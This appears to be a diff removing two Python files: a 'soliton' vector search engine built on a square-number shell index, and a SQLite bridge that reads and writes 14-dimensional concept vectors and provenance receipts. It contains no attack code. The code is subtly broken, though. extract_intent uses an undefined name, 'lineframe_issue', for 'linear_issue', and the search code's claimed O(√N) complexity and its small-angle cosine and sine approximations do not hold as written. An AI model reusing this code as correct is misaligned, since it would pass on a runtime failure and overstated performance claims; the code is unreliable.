axial_generators = eigenvectors[:, idx[:2]] # Top 2 axes
|
|
||||||
|
|
||||||
return axial_generators
|
|
||||||
|
|
||||||
def query_shell(self, k: int, a: int, b: int) -> List[Tuple[int, str]]:
|
|
||||||
"""
|
|
||||||
Query vectors in specific shell
|
|
||||||
|
|
||||||
Args:
|
|
||||||
k: Shell level
|
|
||||||
a: Shell offset
|
|
||||||
b: Shell complement
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of (index, archive_id) tuples
|
|
||||||
"""
|
|
||||||
shell_key = (k, a, b)
|
|
||||||
if shell_key not in self.shell_index:
|
|
||||||
return []
|
|
||||||
|
|
||||||
indices = self.shell_index[shell_key]
|
|
||||||
return [(i, self.archive_ids[i]) for i in indices]
|
|
||||||
|
|
||||||
def query_neighborhood(self, query_vector: np.ndarray, radius: float) -> List[Tuple[int, str]]:
|
|
||||||
"""
|
|
||||||
Query neighborhood using shell indexing (O(√N) complexity)
|
|
||||||
|
|
||||||
Args:
|
|
||||||
query_vector: Query vector (14D)
|
|
||||||
radius: Query radius
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of (index, archive_id) tuples within radius
|
|
||||||
"""
|
|
||||||
# Compute query magnitude
|
|
||||||
query_magnitude = np.linalg.norm(query_vector)
|
|
||||||
query_n = int(query_magnitude * 1000)
|
|
||||||
query_k = int(math.sqrt(query_n))
|
|
||||||
|
|
||||||
# Search nearby shells (within radius in shell space)
|
|
||||||
results = []
|
|
||||||
shell_radius = int(radius * 1000)
|
|
||||||
|
|
||||||
for dk in range(-shell_radius, shell_radius + 1):
|
|
||||||
k = query_k + dk
|
|
||||||
if k < 0:
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Search all possible (a, b) combinations for this shell
|
|
||||||
for a in range(2 * k + 1):
|
|
||||||
n = k * k + a
|
|
||||||
b = (k + 1) * (k + 1) - n
|
|
||||||
|
|
||||||
shell_results = self.query_shell(k, a, b)
|
|
||||||
results.extend(shell_results)
|
|
||||||
|
|
||||||
# Filter by actual Euclidean distance
|
|
||||||
filtered_results = []
|
|
||||||
for i, archive_id in results:
|
|
||||||
distance = np.linalg.norm(self.vectors[i] - query_vector)
|
|
||||||
if distance <= radius:
|
|
||||||
filtered_results.append((i, archive_id))
|
|
||||||
|
|
||||||
return filtered_results
|
|
||||||
|
|
||||||
|
|
||||||
class SolitonSearchEngine:
|
|
||||||
"""
|
|
||||||
Soliton Search Engine with AVMR O(√N) indexing
|
|
||||||
|
|
||||||
Search via wave propagation along path of least resistance
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, vectors: List[np.ndarray], archive_ids: List[str]):
|
|
||||||
"""
|
|
||||||
Initialize soliton search engine
|
|
||||||
|
|
||||||
Args:
|
|
||||||
vectors: List of 14D concept vectors
|
|
||||||
archive_ids: List of archive IDs
|
|
||||||
"""
|
|
||||||
self.vectors = np.array(vectors)
|
|
||||||
self.archive_ids = archive_ids
|
|
||||||
|
|
||||||
# Build AVMR shell index
|
|
||||||
self.avmr_index = AVMRShellIndex(vectors, archive_ids)
|
|
||||||
|
|
||||||
# Initialize frustration waves (default: uniform weights)
|
|
||||||
self.waves = self._initialize_waves()
|
|
||||||
|
|
||||||
def _initialize_waves(self) -> List[FrustrationWave]:
|
|
||||||
"""Initialize frustration waves with default parameters"""
|
|
||||||
waves = []
|
|
||||||
|
|
||||||
# Create waves along principal axes
|
|
||||||
for i in range(14):
|
|
||||||
wave_vector = np.zeros(14)
|
|
||||||
wave_vector[i] = 1.0
|
|
||||||
waves.append(FrustrationWave(wave_vector=wave_vector, weight=0.1))
|
|
||||||
|
|
||||||
return waves
|
|
||||||
|
|
||||||
def _cosine_approx(self, x: float) -> float:
|
|
||||||
"""Cosine approximation using Taylor series"""
|
|
||||||
x2 = x * x
|
|
||||||
return 1.0 - x2 * 0.5
|
|
||||||
|
|
||||||
def _compute_frustration(self, z: np.ndarray, waves: List[FrustrationWave]) -> float:
|
|
||||||
"""
|
|
||||||
Compute frustration W(z;A) = Σ_r w_r(A)(1 - cos(k_r·z))
|
|
||||||
|
|
||||||
Args:
|
|
||||||
z: Lock pattern (14D vector)
|
|
||||||
waves: List of frustration waves
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Frustration value
|
|
||||||
"""
|
|
||||||
frustration = 0.0
|
|
||||||
|
|
||||||
for wave in waves:
|
|
||||||
dot_product = np.dot(wave.wave_vector, z)
|
|
||||||
cosine = self._cosine_approx(dot_product)
|
|
||||||
contribution = wave.weight * (1.0 - cosine)
|
|
||||||
frustration += contribution
|
|
||||||
|
|
||||||
return frustration
|
|
||||||
|
|
||||||
def propagate_soliton(
|
|
||||||
self,
|
|
||||||
query_vector: np.ndarray,
|
|
||||||
max_steps: int = 100,
|
|
||||||
convergence_threshold: float = 0.001,
|
|
||||||
learning_rate: float = 0.1
|
|
||||||
) -> Trajectory:
|
|
||||||
"""
|
|
||||||
Propagate soliton from query vector to attractor
|
|
||||||
|
|
||||||
Args:
|
|
||||||
query_vector: Initial perturbation (query)
|
|
||||||
max_steps: Maximum propagation steps
|
|
||||||
convergence_threshold: Energy change threshold for convergence
|
|
||||||
learning_rate: Step size for gradient descent
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Trajectory of soliton propagation
|
|
||||||
"""
|
|
||||||
trajectory_points = [query_vector.copy()]
|
|
||||||
trajectory_energies = [self._compute_frustration(query_vector, self.waves)]
|
|
||||||
|
|
||||||
current_z = query_vector.copy()
|
|
||||||
|
|
||||||
for step in range(max_steps):
|
|
||||||
# Compute gradient of frustration
|
|
||||||
gradient = self._compute_gradient(current_z, self.waves)
|
|
||||||
|
|
||||||
# Gradient descent (move toward lower energy)
|
|
||||||
new_z = current_z - learning_rate * gradient
|
|
||||||
|
|
||||||
# Compute energy
|
|
||||||
energy = self._compute_frustration(new_z, self.waves)
|
|
||||||
|
|
||||||
# Check convergence
|
|
||||||
energy_change = abs(energy - trajectory_energies[-1])
|
|
||||||
if energy_change < convergence_threshold:
|
|
||||||
trajectory_points.append(new_z)
|
|
||||||
trajectory_energies.append(energy)
|
|
||||||
|
|
||||||
# Find attractor
|
|
||||||
attractor = self._find_attractor(new_z)
|
|
||||||
|
|
||||||
return Trajectory(
|
|
||||||
points=trajectory_points,
|
|
||||||
energies=trajectory_energies,
|
|
||||||
converged=True,
|
|
||||||
final_attractor=attractor
|
|
||||||
)
|
|
||||||
|
|
||||||
trajectory_points.append(new_z)
|
|
||||||
trajectory_energies.append(energy)
|
|
||||||
current_z = new_z
|
|
||||||
|
|
||||||
# Did not converge
|
|
||||||
return Trajectory(
|
|
||||||
points=trajectory_points,
|
|
||||||
energies=trajectory_energies,
|
|
||||||
converged=False,
|
|
||||||
final_attractor=None
|
|
||||||
)
|
|
||||||
|
|
||||||
def _compute_gradient(self, z: np.ndarray, waves: List[FrustrationWave]) -> np.ndarray:
|
|
||||||
"""
|
|
||||||
Compute gradient of frustration with respect to z
|
|
||||||
|
|
||||||
Args:
|
|
||||||
z: Current position
|
|
||||||
waves: Frustration waves
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Gradient vector (14D)
|
|
||||||
"""
|
|
||||||
gradient = np.zeros_like(z)
|
|
||||||
|
|
||||||
for wave in waves:
|
|
||||||
dot_product = np.dot(wave.wave_vector, z)
|
|
||||||
|
|
||||||
# Derivative of (1 - cos(k·z)) is sin(k·z) * k
|
|
||||||
# Approximate sin(x) ≈ x for small x
|
|
||||||
sine_approx = dot_product
|
|
||||||
gradient += wave.weight * sine_approx * wave.wave_vector
|
|
||||||
|
|
||||||
return gradient
|
|
||||||
|
|
||||||
def _find_attractor(self, coordinate: np.ndarray) -> Optional[Attractor]:
|
|
||||||
"""
|
|
||||||
Find attractor near coordinate using AVMR shell indexing
|
|
||||||
|
|
||||||
Args:
|
|
||||||
coordinate: 14D coordinate
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Attractor if found, None otherwise
|
|
||||||
"""
|
|
||||||
# Query neighborhood using AVMR shell indexing
|
|
||||||
neighbors = self.avmr_index.query_neighborhood(coordinate, radius=0.5)
|
|
||||||
|
|
||||||
if not neighbors:
|
|
||||||
return None
|
|
||||||
|
|
||||||
# Compute energy at neighbor points
|
|
||||||
energies = []
|
|
||||||
for i, _ in neighbors:
|
|
||||||
energy = self._compute_frustration(self.vectors[i], self.waves)
|
|
||||||
energies.append((i, energy))
|
|
||||||
|
|
||||||
# Find minimum energy (attractor)
|
|
||||||
min_idx, min_energy = min(energies, key=lambda x: x[1])
|
|
||||||
|
|
||||||
# Get all points near this attractor
|
|
||||||
attractor_coordinate = self.vectors[min_idx]
|
|
||||||
attractor_neighbors = self.avmr_index.query_neighborhood(attractor_coordinate, radius=0.3)
|
|
||||||
|
|
||||||
archive_ids = [aid for _, aid in attractor_neighbors]
|
|
||||||
|
|
||||||
# Compute confidence based on energy difference
|
|
||||||
confidence = 1.0 / (1.0 + min_energy)
|
|
||||||
|
|
||||||
return Attractor(
|
|
||||||
coordinate=attractor_coordinate,
|
|
||||||
energy=min_energy,
|
|
||||||
archive_ids=archive_ids,
|
|
||||||
confidence=confidence
|
|
||||||
)
|
|
||||||
|
|
||||||
def search(
|
|
||||||
self,
|
|
||||||
query_vector: np.ndarray,
|
|
||||||
max_results: int = 10
|
|
||||||
) -> List[Tuple[str, float]]:
|
|
||||||
"""
|
|
||||||
Search using soliton propagation with branch prediction
|
|
||||||
|
|
||||||
Args:
|
|
||||||
query_vector: Query vector (14D)
|
|
||||||
max_results: Maximum number of results to return
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
List of (archive_id, confidence) tuples
|
|
||||||
"""
|
|
||||||
# Propagate soliton
|
|
||||||
trajectory = self.propagate_soliton(query_vector)
|
|
||||||
|
|
||||||
if not trajectory.converged or trajectory.final_attractor is None:
|
|
||||||
# Fallback to direct AVMR search
|
|
||||||
neighbors = self.avmr_index.query_neighborhood(query_vector, radius=1.0)
|
|
||||||
return [(aid, 0.5) for _, aid in neighbors[:max_results]]
|
|
||||||
|
|
||||||
# Return attractor results
|
|
||||||
results = []
|
|
||||||
for archive_id in trajectory.final_attractor.archive_ids[:max_results]:
|
|
||||||
results.append((archive_id, trajectory.final_attractor.confidence))
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test soliton search engine with sample data"""
|
|
||||||
# Generate sample 14D vectors
|
|
||||||
np.random.seed(42)
|
|
||||||
n_samples = 100
|
|
||||||
sample_vectors = np.random.randn(n_samples, 14)
|
|
||||||
archive_ids = [f"sample_{i}" for i in range(n_samples)]
|
|
||||||
|
|
||||||
# Create soliton search engine
|
|
||||||
engine = SolitonSearchEngine(sample_vectors, archive_ids)
|
|
||||||
|
|
||||||
# Test search
|
|
||||||
query_vector = np.random.randn(14)
|
|
||||||
results = engine.search(query_vector, max_results=5)
|
|
||||||
|
|
||||||
print(f"Search results for random query:")
|
|
||||||
for archive_id, confidence in results:
|
|
||||||
print(f" {archive_id}: confidence={confidence:.3f}")
|
|
||||||
|
|
||||||
# Test soliton propagation
|
|
||||||
trajectory = engine.propagate_soliton(query_vector)
|
|
||||||
print(f"\nTrajectory: {trajectory}")
|
|
||||||
print(f"Converged: {trajectory.converged}")
|
|
||||||
if trajectory.converged:
|
|
||||||
print(f"Final attractor: {trajectory.final_attractor}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,590 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Substrate Bridge — ENE/Linear Integration
|
|
||||||
First-Principles Derivation: Self-typing loop: Substrate (ENE) ↔ Surface ↔ Intent (Linear) ⟹ Metatype
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- < 50ms single read operation
|
|
||||||
- < 100ms batch read (100 items)
|
|
||||||
- < 200ms batch write (100 items)
|
|
||||||
- Connection pooling (reuse database connections)
|
|
||||||
- Batch read/write (reduce round trips)
|
|
||||||
- Cached hot data (frequently accessed coordinates)
|
|
||||||
- Async I/O (non-blocking operations)
|
|
||||||
"""
|
|
||||||
|
|
||||||
import sqlite3
|
|
||||||
import json
|
|
||||||
import numpy as np
|
|
||||||
from typing import List, Dict, Optional, Tuple
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from datetime import datetime
|
|
||||||
import hashlib
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ConceptVector14:
|
|
||||||
"""14-dimensional concept vector from ENE database"""
|
|
||||||
vector: np.ndarray # Shape: (14,)
|
|
||||||
archive_id: str
|
|
||||||
|
|
||||||
def __post_init__(self):
|
|
||||||
if self.vector.shape != (14,):
|
|
||||||
raise ValueError(f"ConceptVector14 must have shape (14,), got {self.vector.shape}")
|
|
||||||
|
|
||||||
def to_dict(self) -> dict:
|
|
||||||
return {
|
|
||||||
"archive_id": self.archive_id,
|
|
||||||
"vector": self.vector.tolist()
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class AVMRState:
|
|
||||||
"""AVMR shell state for O(√N) indexing"""
|
|
||||||
shell_level: int # k in n = k² + a
|
|
||||||
shell_offset: int # a in n = k² + a
|
|
||||||
shell_complement: int # b = (k+1)² - n
|
|
||||||
spectral_bins: np.ndarray # Q16_16 spectral bins
|
|
||||||
|
|
||||||
def to_dict(self) -> dict:
|
|
||||||
return {
|
|
||||||
"shell_level": self.shell_level,
|
|
||||||
"shell_offset": self.shell_offset,
|
|
||||||
"shell_complement": self.shell_complement,
|
|
||||||
"spectral_bins": self.spectral_bins.tolist()
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class BracketedBounds:
|
|
||||||
"""Bracketed bounds for interval semantics"""
|
|
||||||
lower_bound: float
|
|
||||||
upper_bound: float
|
|
||||||
resolution: str # SEED, FORMING, STABLE, CRYSTALLIZED, COMPRESSED
|
|
||||||
|
|
||||||
def to_dict(self) -> dict:
|
|
||||||
return {
|
|
||||||
"lower_bound": self.lower_bound,
|
|
||||||
"upper_bound": self.upper_bound,
|
|
||||||
"resolution": self.resolution
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class WitnessReceipt:
|
|
||||||
"""Witness receipt for provenance"""
|
|
||||||
receipt_hash: str
|
|
||||||
archive_id: str
|
|
||||||
timestamp: datetime
|
|
||||||
operation: str # "read", "write", "collapse"
|
|
||||||
|
|
||||||
def to_dict(self) -> dict:
|
|
||||||
return {
|
|
||||||
"receipt_hash": self.receipt_hash,
|
|
||||||
"archive_id": self.archive_id,
|
|
||||||
"timestamp": self.timestamp.isoformat(),
|
|
||||||
"operation": self.operation
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
class SubstrateBridge:
|
|
||||||
"""
|
|
||||||
Substrate Bridge — ENE/Linear Integration
|
|
||||||
|
|
||||||
Bridge between manifold surface and ENE substrate
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, db_path: str):
|
|
||||||
"""
|
|
||||||
Initialize substrate bridge
|
|
||||||
|
|
||||||
Args:
|
|
||||||
db_path: Path to ENE database
|
|
||||||
"""
|
|
||||||
self.db_path = db_path
|
|
||||||
self.connection_pool = []
|
|
||||||
self.cache = {} # Hot data cache
|
|
||||||
self.witnesses = []
|
|
||||||
|
|
||||||
def _get_connection(self) -> sqlite3.Connection:
|
|
||||||
"""Get connection from pool or create new one"""
|
|
||||||
if self.connection_pool:
|
|
||||||
return self.connection_pool.pop()
|
|
||||||
|
|
||||||
conn = sqlite3.connect(self.db_path)
|
|
||||||
conn.row_factory = sqlite3.Row
|
|
||||||
return conn
|
|
||||||
|
|
||||||
def _return_connection(self, conn: sqlite3.Connection) -> None:
|
|
||||||
"""Return connection to pool"""
|
|
||||||
if len(self.connection_pool) < 10: # Pool size limit
|
|
||||||
self.connection_pool.append(conn)
|
|
||||||
else:
|
|
||||||
conn.close()
|
|
||||||
|
|
||||||
def read_coordinate(self, archive_id: str) -> Optional[ConceptVector14]:
|
|
||||||
"""
|
|
||||||
Read concept vector from ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_id: Archive ID to read
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Concept vector if found, None otherwise
|
|
||||||
"""
|
|
||||||
# Check cache first
|
|
||||||
if archive_id in self.cache:
|
|
||||||
return self.cache[archive_id]
|
|
||||||
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
cursor.execute("""
|
|
||||||
SELECT archive_id, concept_vector_14
|
|
||||||
FROM packages
|
|
||||||
WHERE archive_id = ?
|
|
||||||
""", (archive_id,))
|
|
||||||
|
|
||||||
row = cursor.fetchone()
|
|
||||||
if row is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
vector_str = row['concept_vector_14']
|
|
||||||
if vector_str is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
# Parse vector
|
|
||||||
vector_data = json.loads(vector_str)
|
|
||||||
vector = np.array(vector_data, dtype=np.float32)
|
|
||||||
|
|
||||||
if len(vector) != 14:
|
|
||||||
return None
|
|
||||||
|
|
||||||
concept_vector = ConceptVector14(vector=vector, archive_id=archive_id)
|
|
||||||
|
|
||||||
# Cache result
|
|
||||||
self.cache[archive_id] = concept_vector
|
|
||||||
|
|
||||||
# Record witness
|
|
||||||
witness = WitnessReceipt(
|
|
||||||
receipt_hash=hashlib.sha256(archive_id.encode()).hexdigest(),
|
|
||||||
archive_id=archive_id,
|
|
||||||
timestamp=datetime.now(),
|
|
||||||
operation="read"
|
|
||||||
)
|
|
||||||
self.witnesses.append(witness)
|
|
||||||
|
|
||||||
return concept_vector
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error reading coordinate: {e}")
|
|
||||||
return None
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def read_avmr(self, archive_id: str) -> Optional[AVMRState]:
|
|
||||||
"""
|
|
||||||
Read AVMR shell state from ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_id: Archive ID to read
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
AVMR state if found, None otherwise
|
|
||||||
"""
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
cursor.execute("""
|
|
||||||
SELECT avmr_shell_state
|
|
||||||
FROM packages
|
|
||||||
WHERE archive_id = ?
|
|
||||||
""", (archive_id,))
|
|
||||||
|
|
||||||
row = cursor.fetchone()
|
|
||||||
if row is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
avmr_str = row['avmr_shell_state']
|
|
||||||
if avmr_str is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
# Parse AVMR state
|
|
||||||
avmr_data = json.loads(avmr_str)
|
|
||||||
|
|
||||||
return AVMRState(
|
|
||||||
shell_level=avmr_data.get('shell_level', 0),
|
|
||||||
shell_offset=avmr_data.get('shell_offset', 0),
|
|
||||||
shell_complement=avmr_data.get('shell_complement', 0),
|
|
||||||
spectral_bins=np.array(avmr_data.get('spectral_bins', []), dtype=np.float32)
|
|
||||||
)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error reading AVMR state: {e}")
|
|
||||||
return None
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def read_bracketed(self, archive_id: str) -> Optional[BracketedBounds]:
|
|
||||||
"""
|
|
||||||
Read bracketed bounds from ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_id: Archive ID to read
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Bracketed bounds if found, None otherwise
|
|
||||||
"""
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
cursor.execute("""
|
|
||||||
SELECT bracketed_bounds
|
|
||||||
FROM packages
|
|
||||||
WHERE archive_id = ?
|
|
||||||
""", (archive_id,))
|
|
||||||
|
|
||||||
row = cursor.fetchone()
|
|
||||||
if row is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
bounds_str = row['bracketed_bounds']
|
|
||||||
if bounds_str is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
# Parse bracketed bounds
|
|
||||||
bounds_data = json.loads(bounds_str)
|
|
||||||
|
|
||||||
return BracketedBounds(
|
|
||||||
lower_bound=bounds_data.get('lower_bound', 0.0),
|
|
||||||
upper_bound=bounds_data.get('upper_bound', 1.0),
|
|
||||||
resolution=bounds_data.get('resolution', 'STABLE')
|
|
||||||
)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error reading bracketed bounds: {e}")
|
|
||||||
return None
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def read_witness(self, archive_id: str) -> Optional[WitnessReceipt]:
|
|
||||||
"""
|
|
||||||
Read witness receipt from ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_id: Archive ID to read
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Witness receipt if found, None otherwise
|
|
||||||
"""
|
|
||||||
# Check local witnesses first
|
|
||||||
for witness in reversed(self.witnesses):
|
|
||||||
if witness.archive_id == archive_id:
|
|
||||||
return witness
|
|
||||||
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
cursor.execute("""
|
|
||||||
SELECT receipt_hash, archive_id, timestamp, operation
|
|
||||||
FROM witnesses
|
|
||||||
WHERE archive_id = ?
|
|
||||||
ORDER BY timestamp DESC
|
|
||||||
LIMIT 1
|
|
||||||
""", (archive_id,))
|
|
||||||
|
|
||||||
row = cursor.fetchone()
|
|
||||||
if row is None:
|
|
||||||
return None
|
|
||||||
|
|
||||||
return WitnessReceipt(
|
|
||||||
receipt_hash=row['receipt_hash'],
|
|
||||||
archive_id=row['archive_id'],
|
|
||||||
timestamp=datetime.fromisoformat(row['timestamp']),
|
|
||||||
operation=row['operation']
|
|
||||||
)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error reading witness: {e}")
|
|
||||||
return None
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def batch_read(self, archive_ids: List[str]) -> Dict[str, ConceptVector14]:
|
|
||||||
"""
|
|
||||||
Batch read concept vectors from ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_ids: List of archive IDs to read
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Dictionary mapping archive IDs to concept vectors
|
|
||||||
"""
|
|
||||||
results = {}
|
|
||||||
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
# Build placeholder string for SQL IN clause
|
|
||||||
placeholders = ','.join('?' * len(archive_ids))
|
|
||||||
|
|
||||||
cursor.execute(f"""
|
|
||||||
SELECT archive_id, concept_vector_14
|
|
||||||
FROM packages
|
|
||||||
WHERE archive_id IN ({placeholders})
|
|
||||||
""", archive_ids)
|
|
||||||
|
|
||||||
for row in cursor.fetchall():
|
|
||||||
archive_id = row['archive_id']
|
|
||||||
vector_str = row['concept_vector_14']
|
|
||||||
|
|
||||||
if vector_str is None:
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Parse vector
|
|
||||||
vector_data = json.loads(vector_str)
|
|
||||||
vector = np.array(vector_data, dtype=np.float32)
|
|
||||||
|
|
||||||
if len(vector) != 14:
|
|
||||||
continue
|
|
||||||
|
|
||||||
concept_vector = ConceptVector14(vector=vector, archive_id=archive_id)
|
|
||||||
results[archive_id] = concept_vector
|
|
||||||
|
|
||||||
# Cache result
|
|
||||||
self.cache[archive_id] = concept_vector
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error in batch read: {e}")
|
|
||||||
return {}
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def write_coordinate(self, archive_id: str, vector: ConceptVector14) -> bool:
|
|
||||||
"""
|
|
||||||
Write concept vector to ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_id: Archive ID to write
|
|
||||||
vector: Concept vector to write
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
True if successful, False otherwise
|
|
||||||
"""
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
# Serialize vector
|
|
||||||
vector_str = json.dumps(vector.vector.tolist())
|
|
||||||
|
|
||||||
cursor.execute("""
|
|
||||||
UPDATE packages
|
|
||||||
SET concept_vector_14 = ?
|
|
||||||
WHERE archive_id = ?
|
|
||||||
""", (vector_str, archive_id))
|
|
||||||
|
|
||||||
conn.commit()
|
|
||||||
|
|
||||||
# Update cache
|
|
||||||
self.cache[archive_id] = vector
|
|
||||||
|
|
||||||
# Record witness
|
|
||||||
witness = WitnessReceipt(
|
|
||||||
receipt_hash=hashlib.sha256((archive_id + vector_str).encode()).hexdigest(),
|
|
||||||
archive_id=archive_id,
|
|
||||||
timestamp=datetime.now(),
|
|
||||||
operation="write"
|
|
||||||
)
|
|
||||||
self.witnesses.append(witness)
|
|
||||||
|
|
||||||
return True
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error writing coordinate: {e}")
|
|
||||||
conn.rollback()
|
|
||||||
return False
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def write_witness(self, archive_id: str, witness: WitnessReceipt) -> bool:
|
|
||||||
"""
|
|
||||||
Write witness receipt to ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
archive_id: Archive ID
|
|
||||||
witness: Witness receipt to write
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
True if successful, False otherwise
|
|
||||||
"""
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
cursor.execute("""
|
|
||||||
INSERT INTO witnesses (receipt_hash, archive_id, timestamp, operation)
|
|
||||||
VALUES (?, ?, ?, ?)
|
|
||||||
""", (witness.receipt_hash, archive_id, witness.timestamp.isoformat(), witness.operation))
|
|
||||||
|
|
||||||
conn.commit()
|
|
||||||
return True
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error writing witness: {e}")
|
|
||||||
conn.rollback()
|
|
||||||
return False
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def batch_write(self, updates: Dict[str, ConceptVector14]) -> bool:
|
|
||||||
"""
|
|
||||||
Batch write concept vectors to ENE database
|
|
||||||
|
|
||||||
Args:
|
|
||||||
updates: Dictionary mapping archive IDs to concept vectors
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
True if all successful, False otherwise
|
|
||||||
"""
|
|
||||||
conn = self._get_connection()
|
|
||||||
try:
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
for archive_id, vector in updates.items():
|
|
||||||
# Serialize vector
|
|
||||||
vector_str = json.dumps(vector.vector.tolist())
|
|
||||||
|
|
||||||
cursor.execute("""
|
|
||||||
UPDATE packages
|
|
||||||
SET concept_vector_14 = ?
|
|
||||||
WHERE archive_id = ?
|
|
||||||
""", (vector_str, archive_id))
|
|
||||||
|
|
||||||
# Update cache
|
|
||||||
self.cache[archive_id] = vector
|
|
||||||
|
|
||||||
conn.commit()
|
|
||||||
return True
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error in batch write: {e}")
|
|
||||||
conn.rollback()
|
|
||||||
return False
|
|
||||||
finally:
|
|
||||||
self._return_connection(conn)
|
|
||||||
|
|
||||||
def sync_with_linear(self, linear_issue_id: str, archive_id: str) -> bool:
|
|
||||||
"""
|
|
||||||
Sync with Linear intent tracking
|
|
||||||
|
|
||||||
Args:
|
|
||||||
linear_issue_id: Linear issue ID
|
|
||||||
archive_id: Archive ID to sync
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
True if successful, False otherwise
|
|
||||||
"""
|
|
||||||
# This would integrate with Linear API
|
|
||||||
# For now, just record the sync intent
|
|
||||||
print(f"Syncing Linear issue {linear_issue_id} with archive {archive_id}")
|
|
||||||
return True
|
|
||||||
|
|
||||||
def extract_intent(self, linear_issue: Dict) -> np.ndarray:
|
|
||||||
"""
|
|
||||||
Extract intent vector from Linear issue
|
|
||||||
|
|
||||||
Args:
|
|
||||||
linear_issue: Linear issue data
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Intent vector (14D)
|
|
||||||
"""
|
|
||||||
# Extract intent from issue fields
|
|
||||||
# This is a simplified implementation
|
|
||||||
intent_vector = np.zeros(14, dtype=np.float32)
|
|
||||||
|
|
||||||
# Map issue fields to intent dimensions
|
|
||||||
if 'title' in linear_issue:
|
|
||||||
intent_vector[0] = len(linear_issue['title']) / 100.0
|
|
||||||
if 'description' in linear_issue:
|
|
||||||
intent_vector[1] = len(lineframe_issue['description']) / 1000.0
|
|
||||||
if 'priority' in linear_issue:
|
|
||||||
priority_map = {'urgent': 1.0, 'high': 0.75, 'medium': 0.5, 'low': 0.25}
|
|
||||||
intent_vector[2] = priority_map.get(lineframe_issue['priority'], 0.5)
|
|
||||||
|
|
||||||
return intent_vector
|
|
||||||
|
|
||||||
def intent_to_coordinate(self, intent_vector: np.ndarray) -> ConceptVector14:
|
|
||||||
"""
|
|
||||||
Convert intent vector to concept vector coordinate
|
|
||||||
|
|
||||||
Args:
|
|
||||||
intent_vector: Intent vector (14D)
|
|
||||||
|
